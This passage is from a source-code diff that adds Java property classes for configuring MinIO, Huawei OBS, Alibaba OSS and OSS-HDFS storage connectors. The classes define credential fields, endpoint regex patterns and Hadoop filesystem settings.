LinkedHashMap<>(); + hadoopConfigMap.put("fs.local.impl", "org.apache.hadoop.fs.LocalFileSystem"); + hadoopConfigMap.put("fs.file.impl", "org.apache.hadoop.fs.LocalFileSystem"); + } + + @Override + protected Set schemas() { + return ImmutableSet.of(); + } +} diff --git a/fe/fe-property/src/main/java/org/apache/doris/property/storage/MinioProperties.java b/fe/fe-property/src/main/java/org/apache/doris/property/storage/MinioProperties.java new file mode 100644 index 00000000000000..ff6db6f7d00550 --- /dev/null +++ b/fe/fe-property/src/main/java/org/apache/doris/property/storage/MinioProperties.java @@ -0,0 +1,143 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.property.storage; + +import org.apache.doris.foundation.property.ConnectorProperty; + +import com.google.common.collect.ImmutableSet; +import lombok.Getter; +import lombok.Setter; + +import java.util.Map; +import java.util.Set; +import java.util.regex.Pattern; + +public class MinioProperties extends AbstractS3CompatibleProperties { + @Setter + @Getter + @ConnectorProperty(names = {"minio.endpoint", "s3.endpoint", "AWS_ENDPOINT", "endpoint", "ENDPOINT"}, + required = false, description = "The endpoint of Minio.") + protected String endpoint = ""; + @Getter + @Setter + @ConnectorProperty(names = {"minio.region", "s3.region", "AWS_REGION", "region", "REGION"}, + required = false, + isRegionField = true, + description = "The region of MinIO.") + protected String region = "us-east-1"; + + @Getter + @ConnectorProperty(names = {"minio.access_key", "s3.access-key-id", "AWS_ACCESS_KEY", "ACCESS_KEY", + "access_key", "s3.access_key"}, + required = false, + sensitive = true, + description = "The access key of Minio.") + protected String accessKey = ""; + + @Getter + @ConnectorProperty(names = {"minio.secret_key", "s3.secret-access-key", "s3.secret_key", "AWS_SECRET_KEY", + "secret_key", "SECRET_KEY"}, + required = false, + sensitive = true, + description = "The secret key of Minio.") + protected String secretKey = ""; + + @Getter + @ConnectorProperty(names = {"minio.session_token", "s3.session-token", "s3.session_token", "session_token"}, + required = false, + sensitive = true, + description = "The session token of Minio.") + protected String sessionToken = ""; + + /** + * The maximum number of concurrent connections that can be made to the object storage system. + * This value is optional and can be configured by the user. + */ + @Getter + @ConnectorProperty(names = {"minio.connection.maximum", "s3.connection.maximum"}, required = false, + description = "Maximum number of connections.") + protected String maxConnections = "100"; + + /** + * The timeout (in milliseconds) for requests made to the object storage system. + * This value is optional and can be configured by the user. + */ + @Getter + @ConnectorProperty(names = {"minio.connection.request.timeout", "s3.connection.request.timeout"}, required = false, + description = "Request timeout in seconds.") + protected String requestTimeoutS = "10000"; + + /** + * The timeout (in milliseconds) for establishing a connection to the object storage system. + * This value is optional and can be configured by the user. + */ + @Getter + @ConnectorProperty(names = {"minio.connection.timeout", "s3.connection.timeout"}, required = false, + description = "Connection timeout in seconds.") + protected String connectionTimeoutS = "10000"; + + /** + * Flag indicating whether to use path-style URLs for the object storage system. + * This value is optional and can be configured by the user. + */ + @Setter + @Getter + @ConnectorProperty(names = {"minio.use_path_style", "use_path_style", "s3.path-style-access"}, required = false, + description = "Whether to use path style URL for the storage.") + protected String usePathStyle = "false"; + + @ConnectorProperty(names = {"minio.force_parsing_by_standard_uri", "force_parsing_by_standard_uri"}, + required = false, + description = "Whether to use path style URL for the storage.") + @Setter + @Getter + protected String forceParsingByStandardUrl = "false"; + + private static final Set IDENTIFIERS = ImmutableSet.of("minio.access_key", "AWS_ACCESS_KEY", "ACCESS_KEY", + "access_key", "s3.access_key", "minio.endpoint", "s3.endpoint", "AWS_ENDPOINT", "endpoint", "ENDPOINT"); + + /** + * Constructor to initialize the object storage properties with the provided type and original properties map. + * + * @param origProps the original properties map. + */ + protected MinioProperties(Map origProps) { + super(Type.MINIO, origProps); + } + + public static boolean guessIsMe(Map origProps) { + //ugly, but we need to check if the user has set any of the identifiers + if (AzureProperties.guessIsMe(origProps) || COSProperties.guessIsMe(origProps) + || OSSProperties.guessIsMe(origProps) || S3Properties.guessIsMe(origProps)) { + return false; + } + + return IDENTIFIERS.stream().map(origProps::get).anyMatch(value -> value != null && !value.isEmpty()); + } + + + @Override + protected Set endpointPatterns() { + return ImmutableSet.of(Pattern.compile("^(?:https?://)?[a-zA-Z0-9.-]+(?::\\d+)?$")); + } + + @Override + protected Set schemas() { + return ImmutableSet.of("s3"); + } +} diff --git a/fe/fe-property/src/main/java/org/apache/doris/property/storage/OBSProperties.java b/fe/fe-property/src/main/java/org/apache/doris/property/storage/OBSProperties.java new file mode 100644 index 00000000000000..9d6a39ffcfe31d --- /dev/null +++ b/fe/fe-property/src/main/java/org/apache/doris/property/storage/OBSProperties.java @@ -0,0 +1,204 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.property.storage; + +import org.apache.doris.foundation.property.ConnectorPropertiesUtils; +import org.apache.doris.foundation.property.ConnectorProperty; + +import com.google.common.base.Strings; +import com.google.common.collect.ImmutableSet; +import lombok.Getter; +import lombok.Setter; +import org.apache.commons.lang3.StringUtils; + +import java.util.Map; +import java.util.Objects; +import java.util.Optional; +import java.util.Set; +import java.util.regex.Pattern; +import java.util.stream.Stream; + +public class OBSProperties extends AbstractS3CompatibleProperties { + + @Setter + @Getter + @ConnectorProperty(names = {"obs.endpoint", "s3.endpoint", "AWS_ENDPOINT", "endpoint", "ENDPOINT"}, + required = false, + description = "The endpoint of OBS.") + protected String endpoint = ""; + + @Getter + @ConnectorProperty(names = {"obs.access_key", "s3.access_key", "s3.access-key-id", "AWS_ACCESS_KEY", + "access_key", "ACCESS_KEY"}, + required = false, + sensitive = true, + description = "The access key of OBS.") + protected String accessKey = ""; + + @Getter + @ConnectorProperty(names = {"obs.secret_key", "s3.secret_key", "s3.secret-access-key", "AWS_SECRET_KEY", + "secret_key", "SECRET_KEY"}, + required = false, + sensitive = true, + description = "The secret key of OBS.") + protected String secretKey = ""; + + @Getter + @Setter + @ConnectorProperty(names = {"obs.region", "s3.region", "AWS_REGION", "region", "REGION"}, required = false, + isRegionField = true, + description = "The region of OBS.") + protected String region; + + @Getter + @ConnectorProperty(names = {"obs.session_token", "s3.session_token", "s3.session-token", "session_token"}, + required = false, + description = "The session token of OBS.") + protected String sessionToken = ""; + + /** + * The maximum number of concurrent connections that can be made to the object storage system. + * This value is optional and can be configured by the user. + */ + @Getter + @ConnectorProperty(names = {"obs.connection.maximum", "s3.connection.maximum"}, required = false, + description = "Maximum number of connections.") + protected String maxConnections = "100"; + + /** + * The timeout (in milliseconds) for requests made to the object storage system. + * This value is optional and can be configured by the user. + */ + @Getter + @ConnectorProperty(names = {"obs.connection.request.timeout", "s3.connection.request.timeout"}, required = false, + description = "Request timeout in seconds.") + protected String requestTimeoutS = "10000"; + + /** + * The timeout (in milliseconds) for establishing a connection to the object storage system. + * This value is optional and can be configured by the user. + */ + @Getter + @ConnectorProperty(names = {"obs.connection.timeout", "s3.connection.timeout"}, required = false, + description = "Connection timeout in seconds.") + protected String connectionTimeoutS = "10000"; + + /** + * Flag indicating whether to use path-style URLs for the object storage system. + * This value is optional and can be configured by the user. + */ + @Setter + @Getter + @ConnectorProperty(names = {"obs.use_path_style", "use_path_style", "s3.path-style-access"}, required = false, + description = "Whether to use path style URL for the storage.") + protected String usePathStyle = "false"; + + @ConnectorProperty(names = {"obs.force_parsing_by_standard_uri", "force_parsing_by_standard_uri"}, required = false, + description = "Whether to use path style URL for the storage.") + @Setter + @Getter + protected String forceParsingByStandardUrl = "false"; + + /** + * Pattern to extract the region from a Huawei Cloud OBS endpoint. + *

      + * Supported formats: + * - obs-cn-hangzhou.myhuaweicloud.com => region = cn-hangzhou + * - https://obs-cn-shanghai.myhuaweicloud.com => region = cn-shanghai + *

      + * Group(1) captures the region name (e.g., cn-hangzhou). + * FYI: https://console-intl.huaweicloud.com/apiexplorer/#/endpoint/OBS + */ + private static final Set ENDPOINT_PATTERN = ImmutableSet.of(Pattern + .compile("^(?:https?://)?obs\\.([a-z0-9-]+)\\.myhuaweicloud\\.com$")); + + + public OBSProperties(Map origProps) { + super(Type.OBS, origProps); + // Initialize fields from origProps + } + + public static OBSProperties of(Map properties) { + OBSProperties propertiesObj = new OBSProperties(properties); + ConnectorPropertiesUtils.bindConnectorProperties(propertiesObj, properties); + propertiesObj.initNormalizeAndCheckProps(); + propertiesObj.initializeHadoopStorageConfig(); + return propertiesObj; + } + + protected static boolean guessIsMe(Map origProps) { + String value = Stream.of("obs.endpoint", "s3.endpoint", "AWS_ENDPOINT", "endpoint", "ENDPOINT") + .map(origProps::get) + .filter(Objects::nonNull) + .findFirst() + .orElse(null); + + if (!Strings.isNullOrEmpty(value)) { + return value.contains("myhuaweicloud.com"); + } + Optional uriValue = origProps.entrySet().stream() + .filter(e -> e.getKey().equalsIgnoreCase("uri")) + .map(Map.Entry::getValue) + .findFirst(); + return uriValue.isPresent() && uriValue.get().contains("myhuaweicloud.com"); + } + + @Override + protected Set endpointPatterns() { + return ENDPOINT_PATTERN; + } + + private static final boolean OBS_FILE_SYSTEM_AVAILABLE = + isClassAvailable("org.apache.hadoop.fs.obs.OBSFileSystem"); + + private static boolean isClassAvailable(String className) { + try { + Class.forName(className, false, OBSProperties.class.getClassLoader()); + return true; + } catch (ClassNotFoundException e) { + return false; + } + } + + @Override + public void initializeHadoopStorageConfig() { + super.initializeHadoopStorageConfig(); + // obs is not compatible with s3a well; prefer native OBSFileSystem if available on the classpath + if (OBS_FILE_SYSTEM_AVAILABLE) { + hadoopConfigMap.put("fs.obs.impl", "org.apache.hadoop.fs.obs.OBSFileSystem"); + hadoopConfigMap.put("fs.AbstractFileSystem.obs.impl", "org.apache.hadoop.fs.obs.OBS"); + } else { + hadoopConfigMap.put("fs.obs.impl", "org.apache.hadoop.fs.s3a.S3AFileSystem"); + } + hadoopConfigMap.put("fs.obs.access.key", accessKey); + hadoopConfigMap.put("fs.obs.secret.key", secretKey); + hadoopConfigMap.put("fs.obs.endpoint", endpoint); + } + + protected void setEndpointIfPossible() { + super.setEndpointIfPossible(); + if (StringUtils.isBlank(getEndpoint())) { + throw new IllegalArgumentException("Property obs.endpoint is required."); + } + } + + @Override + protected Set schemas() { + return ImmutableSet.of("obs"); + } +} diff --git a/fe/fe-property/src/main/java/org/apache/doris/property/storage/OSSHdfsProperties.java b/fe/fe-property/src/main/java/org/apache/doris/property/storage/OSSHdfsProperties.java new file mode 100644 index 00000000000000..f077dc78cc2881 --- /dev/null +++ b/fe/fe-property/src/main/java/org/apache/doris/property/storage/OSSHdfsProperties.java @@ -0,0 +1,217 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.property.storage; + +import org.apache.doris.foundation.property.ConnectorProperty; +import org.apache.doris.foundation.property.StoragePropertiesException; + +import com.google.common.collect.ImmutableSet; +import lombok.Setter; +import org.apache.commons.lang3.StringUtils; + +import java.net.URI; +import java.util.LinkedHashMap; +import java.util.Map; +import java.util.Optional; +import java.util.Set; +import java.util.regex.Matcher; +import java.util.regex.Pattern; + +/** + * todo + * Should consider using the same class as DLF Properties. + * Configuration properties for OSS-HDFS. + * + *

      Important: It is recommended to use the "oss.hdfs" prefix for all OSS-related + * configuration properties instead of the standalone "oss" prefix. + * This is because when both "oss" and "oss.hdfs" prefixed parameters are provided simultaneously, + * the system cannot distinguish which parameter belongs to which prefix, leading to ambiguity and confusion. + * To prevent such conflicts, the standalone "oss" prefix is planned to be fully deprecated in the future. + * + *

      Users should migrate their configurations to use the "oss.hdfs" prefix to ensure clarity + * and future compatibility. + */ +public class OSSHdfsProperties extends HdfsCompatibleProperties { + + @Setter + @ConnectorProperty(names = {"oss.hdfs.endpoint", "oss.endpoint", + "dlf.endpoint", "dlf.catalog.endpoint"}, + description = "The endpoint of OSS.") + protected String endpoint = ""; + + @ConnectorProperty(names = {"oss.hdfs.access_key", "oss.access_key", "dlf.access_key", "dlf.catalog.accessKeyId"}, + sensitive = true, + description = "The access key of OSS.") + protected String accessKey = ""; + + @ConnectorProperty(names = {"oss.hdfs.secret_key", "oss.secret_key", "dlf.secret_key", "dlf.catalog.secret_key"}, + sensitive = true, + description = "The secret key of OSS.") + protected String secretKey = ""; + + @ConnectorProperty(names = {"oss.hdfs.region", "oss.region", "dlf.region"}, + required = false, + description = "The region of OSS.") + protected String region; + + @ConnectorProperty(names = {"oss.hdfs.fs.defaultFS"}, required = false, description = "") + protected String fsDefaultFS = ""; + + @ConnectorProperty(names = {"oss.hdfs.hadoop.config.resources"}, + required = false, + description = "The xml files of Hadoop configuration.") + protected String hadoopConfigResources = ""; + + /** + * TODO: Do not expose to users for now. + * Mutual exclusivity between parameters should be validated at the framework level + * to prevent messy, repetitive checks in application code. + */ + @ConnectorProperty(names = {"oss.hdfs.security_token", "oss.security_token"}, required = false, + description = "The security token of OSS.") + protected String securityToken = ""; + + private static final Set OSS_ENDPOINT_KEY_NAME = ImmutableSet.of("oss.hdfs.endpoint", "oss.endpoint", + "dlf.endpoint", "dlf.catalog.endpoint"); + + private Map backendConfigProperties; + + private static final Set ENDPOINT_PATTERN = ImmutableSet.of(Pattern + .compile("(?:https?://)?([a-z]{2}-[a-z0-9-]+)\\.oss-dls\\.aliyuncs\\.com"), + Pattern.compile("^(?:https?://)?dlf(?:-vpc)?\\.([a-z0-9-]+)\\.aliyuncs\\.com(?:/.*)?$")); + + private static final Set supportSchema = ImmutableSet.of("oss", "hdfs"); + + protected OSSHdfsProperties(Map origProps) { + super(Type.OSS_HDFS, origProps); + } + + private static final String OSS_HDFS_PREFIX_KEY = "oss.hdfs."; + + public static boolean guessIsMe(Map props) { + boolean enable = props.entrySet().stream() + .anyMatch(e -> e.getKey().equalsIgnoreCase(OSS_HDFS_PREFIX_KEY) && Boolean.parseBoolean(e.getValue())); + if (enable) { + return true; + } + String endpoint = OSS_ENDPOINT_KEY_NAME.stream() + .map(props::get) + .filter(ep -> StringUtils.isNotBlank(ep) && ep.endsWith(OSS_HDFS_ENDPOINT_SUFFIX)) + .findFirst() + .orElse(null); + return StringUtils.isNotBlank(endpoint); + } + + @Override + protected void checkRequiredProperties() { + super.checkRequiredProperties(); + } + + private void convertDlfToOssEndpointIfNeeded() { + if (this.endpoint.contains("dlf")) { + // If the endpoint already contains "oss-dls.aliyuncs.com", return it as is. + this.endpoint = this.region + ".oss-dls.aliyuncs.com"; + } + } + + public static Optional extractRegion(String endpoint) { + for (Pattern pattern : ENDPOINT_PATTERN) { + Matcher matcher = pattern.matcher(endpoint.toLowerCase()); + if (matcher.matches()) { + return Optional.ofNullable(matcher.group(1)); + } + } + return Optional.empty(); + } + + @Override + public void initNormalizeAndCheckProps() { + super.initNormalizeAndCheckProps(); + // Extract region from the endpoint, e.g., "cn-shanghai.oss-dls.aliyuncs.com" -> "cn-shanghai" + if (StringUtils.isBlank(this.region)) { + Optional regionOptional = extractRegion(endpoint); + if (!regionOptional.isPresent()) { + throw new IllegalArgumentException("The region extracted from the endpoint is empty. " + + "Please check the endpoint format: {} or set oss.region" + endpoint); + } + this.region = regionOptional.get(); + } + convertDlfToOssEndpointIfNeeded(); + if (StringUtils.isBlank(fsDefaultFS)) { + this.fsDefaultFS = HdfsPropertiesUtils.extractDefaultFsFromUri(origProps, supportSchema); + } + initConfigurationParams(); + } + + private static final String OSS_HDFS_ENDPOINT_SUFFIX = ".oss-dls.aliyuncs.com"; + + @Override + public Map getBackendConfigProperties() { + return backendConfigProperties; + } + + private void initConfigurationParams() { + // TODO: Currently we load all config parameters and pass them to the BE directly. + // In the future, we should pass the path to the configuration directory instead, + // and let the BE load the config file on its own. + Map config = loadConfigFromFile(hadoopConfigResources); + config.put("fs.oss.endpoint", endpoint); + config.put("fs.oss.accessKeyId", accessKey); + config.put("fs.oss.accessKeySecret", secretKey); + config.put("fs.oss.region", region); + config.put("fs.oss.impl", OSSProperties.JINDO_OSS_FILE_SYSTEM_IMPL); + config.put("fs.AbstractFileSystem.oss.impl", OSSProperties.JINDO_OSS_ABSTRACT_FILE_SYSTEM_IMPL); + if (StringUtils.isNotBlank(fsDefaultFS)) { + config.put(HDFS_DEFAULT_FS_NAME, fsDefaultFS); + } + this.backendConfigProperties = config; + this.hadoopConfigMap = new LinkedHashMap<>(); + this.backendConfigProperties.forEach(hadoopConfigMap::put); + } + + @Override + public String validateAndNormalizeUri(String url) throws StoragePropertiesException { + return validateUri(url); + } + + @Override + public String validateAndGetUri(Map loadProps) throws StoragePropertiesException { + String uri = loadProps.get("uri"); + return validateUri(uri); + } + + private String validateUri(String uri) throws StoragePropertiesException { + if (StringUtils.isBlank(uri)) { + throw new StoragePropertiesException("The uri is empty."); + } + URI uriObj = URI.create(uri); + if (uriObj.getScheme() == null) { + throw new StoragePropertiesException("The uri scheme is empty."); + } + if (!uriObj.getScheme().equalsIgnoreCase("oss")) { + throw new StoragePropertiesException("The uri scheme is not oss."); + } + return uriObj.toString(); + } + + @Override + public String getStorageName() { + return "OSSHDFS"; + } + +} diff --git a/fe/fe-property/src/main/java/org/apache/doris/property/storage/OSSProperties.java b/fe/fe-property/src/main/java/org/apache/doris/property/storage/OSSProperties.java new file mode 100644 index 00000000000000..5511f6e0b915be --- /dev/null +++ b/fe/fe-property/src/main/java/org/apache/doris/property/storage/OSSProperties.java @@ -0,0 +1,380 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.property.storage; + +import org.apache.doris.foundation.property.ConnectorPropertiesUtils; +import org.apache.doris.foundation.property.ConnectorProperty; +import org.apache.doris.foundation.property.StoragePropertiesException; + +import com.google.common.annotations.VisibleForTesting; +import com.google.common.collect.ImmutableSet; +import lombok.Getter; +import lombok.Setter; +import org.apache.commons.lang3.BooleanUtils; +import org.apache.commons.lang3.StringUtils; + +import java.net.URI; +import java.net.URISyntaxException; +import java.util.Arrays; +import java.util.List; +import java.util.Map; +import java.util.Objects; +import java.util.Optional; +import java.util.Set; +import java.util.regex.Pattern; +import java.util.stream.Stream; + +public class OSSProperties extends AbstractS3CompatibleProperties { + + @Setter + @Getter + @ConnectorProperty(names = {"oss.endpoint", "s3.endpoint", "AWS_ENDPOINT", "endpoint", "ENDPOINT", "dlf.endpoint", + "dlf.catalog.endpoint", "fs.oss.endpoint"}, + required = false, + description = "The endpoint of OSS.") + protected String endpoint = ""; + + @Getter + @ConnectorProperty(names = {"oss.access_key", "s3.access_key", "s3.access-key-id", "AWS_ACCESS_KEY", "access_key", + "ACCESS_KEY", "dlf.access_key", "dlf.catalog.accessKeyId", "fs.oss.accessKeyId"}, + required = false, + sensitive = true, + description = "The access key of OSS.") + protected String accessKey = ""; + + @Getter + @ConnectorProperty(names = {"oss.secret_key", "s3.secret_key", "s3.secret-access-key", "AWS_SECRET_KEY", + "secret_key", "SECRET_KEY", + "dlf.secret_key", "dlf.catalog.secret_key", "fs.oss.accessKeySecret"}, + required = false, + sensitive = true, + description = "The secret key of OSS.") + protected String secretKey = ""; + + @Getter + @Setter + @ConnectorProperty(names = {"oss.region", "s3.region", "AWS_REGION", "region", "REGION", "dlf.region", + "iceberg.rest.signing-region"}, + required = false, + isRegionField = true, + description = "The region of OSS.") + protected String region; + + @ConnectorProperty(names = {"dlf.access.public", "dlf.catalog.accessPublic"}, + required = false, + description = "Enable public access to Aliyun DLF.") + protected String dlfAccessPublic = "false"; + + @Getter + @ConnectorProperty(names = {"oss.session_token", "s3.session_token", "s3.session-token", "session_token", + "fs.oss.securityToken", "AWS_TOKEN"}, + required = false, + sensitive = true, + description = "The session token of OSS.") + protected String sessionToken = ""; + + /** + * The maximum number of concurrent connections that can be made to the object storage system. + * This value is optional and can be configured by the user. + */ + @Getter + @ConnectorProperty(names = {"oss.connection.maximum", "s3.connection.maximum"}, required = false, + description = "Maximum number of connections.") + protected String maxConnections = "100"; + + /** + * The timeout (in milliseconds) for requests made to the object storage system. + * This value is optional and can be configured by the user. + */ + @Getter + @ConnectorProperty(names = {"oss.connection.request.timeout", "s3.connection.request.timeout"}, required = false, + description = "Request timeout in seconds.") + protected String requestTimeoutS = "10000"; + + /** + * The timeout (in milliseconds) for establishing a connection to the object storage system. + * This value is optional and can be configured by the user. + */ + @Getter + @ConnectorProperty(names = {"oss.connection.timeout", "s3.connection.timeout"}, required = false, + description = "Connection timeout in seconds.") + protected String connectionTimeoutS = "10000"; + + /** + * Flag indicating whether to use path-style URLs for the object storage system. + * This value is optional and can be configured by the user. + */ + @Setter + @Getter + @ConnectorProperty(names = {"oss.use_path_style", "use_path_style", "s3.path-style-access"}, required = false, + description = "Whether to use path style URL for the storage.") + protected String usePathStyle = "false"; + + @ConnectorProperty(names = {"oss.force_parsing_by_standard_uri", "force_parsing_by_standard_uri"}, required = false, + description = "Whether to use path style URL for the storage.") + @Setter + @Getter + protected String forceParsingByStandardUrl = "false"; + + private static final Pattern STANDARD_ENDPOINT_PATTERN = Pattern + .compile("^(?:https?://)?(?:s3\\.)?oss-([a-z0-9-]+?)(?:-internal)?\\.aliyuncs\\.com$"); + + /** + * Pattern to extract the region from an Alibaba Cloud OSS endpoint. + *

      + * Supported formats: aliyun oss? + * - oss-cn-hangzhou.aliyuncs.com => region = cn-hangzhou + * - ... => region = cn-shanghai + * - oss-cn-beijing-internal.aliyuncs.com => region = cn-beijing (internal endpoint) + * - ... => region = cn-shenzhen + *

      + * Group(1) captures the region name (e.g., cn-hangzhou). + *

      + * Support S3 compatible endpoints:... + * - s3.cn-hangzhou.aliyuncs.com => region = cn-hangzhou + *

      + * https://help.aliyun.com/zh/dlf/dlf-1-0/developer-reference/api-datalake-2020-07-10-endpoint + * - datalake.cn-hangzhou.aliyuncs.com => region = cn-hangzhou + */ + public static final Set ENDPOINT_PATTERN = ImmutableSet.of(STANDARD_ENDPOINT_PATTERN, + Pattern.compile("^(?:https?://)?dlf(?:-vpc)?\\.([a-z0-9-]+)\\.aliyuncs\\.com(?:/.*)?$"), + Pattern.compile("^(?:https?://)?datalake(?:-vpc)?\\.([a-z0-9-]+)\\.aliyuncs\\.com(?:/.*)?$")); + + private static final List URI_KEYWORDS = Arrays.asList("uri", "warehouse"); + + private static List DLF_TYPE_KEYWORDS = Arrays.asList("hive.metastore.type", + "iceberg.catalog.type", "paimon.catalog.type"); + + static final String JINDO_OSS_FILE_SYSTEM_IMPL = "com.aliyun.jindodata.oss.JindoOssFileSystem"; + static final String JINDO_OSS_ABSTRACT_FILE_SYSTEM_IMPL = "com.aliyun.jindodata.oss.JindoOSS"; + + private static final String DLS_URI_KEYWORDS = "oss-dls.aliyuncs"; + + protected OSSProperties(Map origProps) { + super(Type.OSS, origProps); + } + + public static OSSProperties of(Map properties) { + OSSProperties propertiesObj = new OSSProperties(properties); + ConnectorPropertiesUtils.bindConnectorProperties(propertiesObj, properties); + propertiesObj.initNormalizeAndCheckProps(); + propertiesObj.initializeHadoopStorageConfig(); + return propertiesObj; + } + + protected static boolean guessIsMe(Map origProps) { + String value = Stream.of("oss.endpoint", "s3.endpoint", "AWS_ENDPOINT", "endpoint", "ENDPOINT", + "dlf.endpoint", "dlf.catalog.endpoint", "fs.oss.endpoint", "fs.oss.accessKeyId") + .map(origProps::get) + .filter(Objects::nonNull) + .findFirst() + .orElse(null); + if (StringUtils.isNotBlank(value)) { + if (value.contains(DLS_URI_KEYWORDS)) { + return false; + } + return (value.contains("aliyuncs.com")); + } + + value = Stream.of("oss.region") + .map(origProps::get) + .filter(Objects::nonNull) + .findFirst() + .orElse(null); + if (StringUtils.isNotBlank(value)) { + return true; + } + if (isDlfMSType(origProps)) { + return true; + } + Optional uriValue = origProps.entrySet().stream() + .filter(e -> URI_KEYWORDS.stream() + .anyMatch(key -> key.equalsIgnoreCase(e.getKey()))) + .map(Map.Entry::getValue) + .filter(Objects::nonNull) + .filter(OSSProperties::isKnownObjectStorage) + .findFirst(); + return uriValue.filter(OSSProperties::isKnownObjectStorage).isPresent(); + } + + private static boolean isKnownObjectStorage(String value) { + if (value == null) { + return false; + } + boolean isDls = value.contains(DLS_URI_KEYWORDS); + if (isDls) { + return false; + } + if (value.startsWith("oss://")) { + return true; + } + if (!value.contains("aliyuncs.com")) { + return false; + } + boolean isAliyunOss = (value.contains("oss-")); + boolean isAmazonS3 = value.contains("s3."); + return isAliyunOss || isAmazonS3; + } + + private static boolean isDlfMSType(Map params) { + return DLF_TYPE_KEYWORDS.stream() + .anyMatch(key -> params.containsKey(key) && StringUtils.isNotBlank(params.get(key)) + && StringUtils.equalsIgnoreCase("dlf", params.get(key))); + } + + @Override + protected void setEndpointIfPossible() { + if (StringUtils.isBlank(this.endpoint) && StringUtils.isNotBlank(this.region)) { + if (isDlfMSType(origProps)) { + this.endpoint = getOssEndpoint(region, BooleanUtils.toBoolean(dlfAccessPublic)); + } else { + Optional uriValueOpt = origProps.entrySet().stream() + .filter(e -> URI_KEYWORDS.stream() + .anyMatch(key -> key.equalsIgnoreCase(e.getKey()))) + .map(Map.Entry::getValue) + .filter(Objects::nonNull) + .filter(OSSProperties::isKnownObjectStorage) + .findFirst(); + if (uriValueOpt.isPresent()) { + String uri = uriValueOpt.get(); + // If the URI does not start with http(s), derive endpoint from region + // (http(s) URIs are handled by separate logic elsewhere) + if (!uri.startsWith("http://") && !uri.startsWith("https://")) { + this.endpoint = getOssEndpoint(region, BooleanUtils.toBoolean(dlfAccessPublic)); + } + } + } + } + super.setEndpointIfPossible(); + } + + @Override + public String validateAndNormalizeUri(String uri) throws StoragePropertiesException { + return super.validateAndNormalizeUri(rewriteOssBucketIfNecessary(uri)); + } + + @Override + public void initNormalizeAndCheckProps() { + super.initNormalizeAndCheckProps(); + if (StringUtils.isBlank(endpoint) || !STANDARD_ENDPOINT_PATTERN.matcher(endpoint).matches()) { + this.endpoint = getOssEndpoint(region, BooleanUtils.toBoolean(dlfAccessPublic)); + } + } + + private static String getOssEndpoint(String region, boolean publicAccess) { + String prefix = "oss-"; + String suffix = ".aliyuncs.com"; + if (!publicAccess) { + suffix = "-internal" + suffix; + } + return prefix + region + suffix; + } + + @Override + protected Set endpointPatterns() { + return ENDPOINT_PATTERN; + } + + @Override + protected Set schemas() { + return ImmutableSet.of("oss"); + } + + @Override + public void initializeHadoopStorageConfig() { + super.initializeHadoopStorageConfig(); + hadoopConfigMap.put("fs.oss.impl", JINDO_OSS_FILE_SYSTEM_IMPL); + hadoopConfigMap.put("fs.AbstractFileSystem.oss.impl", JINDO_OSS_ABSTRACT_FILE_SYSTEM_IMPL); + hadoopConfigMap.put("fs.oss.accessKeyId", accessKey); + hadoopConfigMap.put("fs.oss.accessKeySecret", secretKey); + if (StringUtils.isNotBlank(sessionToken)) { + hadoopConfigMap.put("fs.oss.securityToken", sessionToken); + } + hadoopConfigMap.put("fs.oss.endpoint", endpoint); + hadoopConfigMap.put("fs.oss.region", region); + } + + /** + * Rewrites the bucket part of an OSS URI if the bucket is specified + * in the form of bucket.endpoint. https://help.aliyun.com/zh/oss/user-guide/access-oss-via-bucket-domain-name + * + *

      This method is designed for OSS usage, but it also supports + * the {@code s3://} scheme since OSS URIs are sometimes written + * using the S3-style scheme.

      + * + *

      HTTP and HTTPS URIs are returned unchanged.

      + * + *

      Examples: + *

      +     *   oss://bucket.endpoint/path  -> oss://bucket/path
      +     *   s3://bucket.endpoint        -> s3://bucket
      +     *   https://bucket.endpoint     -> unchanged
      +     * 
